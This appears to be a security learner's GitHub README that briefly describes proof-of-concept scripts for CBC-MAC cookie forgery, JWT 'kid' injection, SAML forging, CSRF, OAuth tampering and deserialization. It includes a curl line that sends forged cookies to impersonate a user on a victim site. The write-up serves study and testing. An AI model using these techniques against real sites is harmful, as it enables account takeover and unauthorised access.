Just posting some of the scripts I write as I strengthen my pythonic coding, some exploit scripts as I work through their write-ups and attempt to develop my own PoC's, as well as random scripts from one-off challenges or snippets undeserving of an entire github shrine dedicated to their rancid memory.
Thanks for reading and checking out my repo!
based on the vulnerability of using a hardcoded IV in CBC-MAC implementation (it should be an IV consisting of just nullbytes) POC based on the idea that if you can modify the IV, you can change parts of the cookie without the signature being invalidated. In a basic misconfiguration such as this, you just need to make a log in, the app should give you a sig and the IV as a cookie. Then compute a XOR of the first block, get the first block of your desired username (this POC uses administrator), XOR from x^y. Hopefully, this simplifies something. Special thanks to Louis Nyffenegger for this one.
puts "curl -H 'Cookie: iv=#{new_iv}; auth=#{new_auth}' <victim site>" exploit to conjure up cookies to impersonate any user, discovered by ooooooo_q @ hackerone https://hackerone.com/reports/473888
inspired by Ruby library Net::FTP (CVE-2017-17405), allows attacker to run commands via KID parameter
common misconfiguration of JSON web tokens vuln script
another JWT POC based on a similar misconfiguration of the KID paramater, this time due to a lack of escaping that can allow SQLI or LFI
Very basic implementation to easily produce that big chunky SAML code you can swap in with a web proxy right before it hits the server
Convert a bunch of spaced ascii numbers into UTF-8, for baby's first crypto challenge
Like above, baby's first hex decoder for human babies.
super primitive CSRF POC, though when applied in JSON format
python3 methodist.py [full url]Tamper with some parameters to expose a weakness in oauth implementation for your web-app. Fill in the variables noted within and deploy with ```
"curl -H 'Authorization: Bearer [TOKEN]' [RESOURCE_SERVER]/api/keys --dump-header -"
POC for a very poor implementation of phar. Hopefully, this is near extinct in the wild and lives on solely through some honeypots.
Again, very simple SAML POC, code couldn't really be boiled down to less really.
couldn't get the other scripts on here to work for me, nor the articles I read for the case I was attempting to exploit. Extremely impressive and clever work from Luke Jahnke and this article. https://www.elttam.com/blog/ruby-deserialization/
Another script from the infant's crypto challenge building blocks primer.
this really doesn't come standard as a bash command and i'm not looking it up on google for the 4th time this season.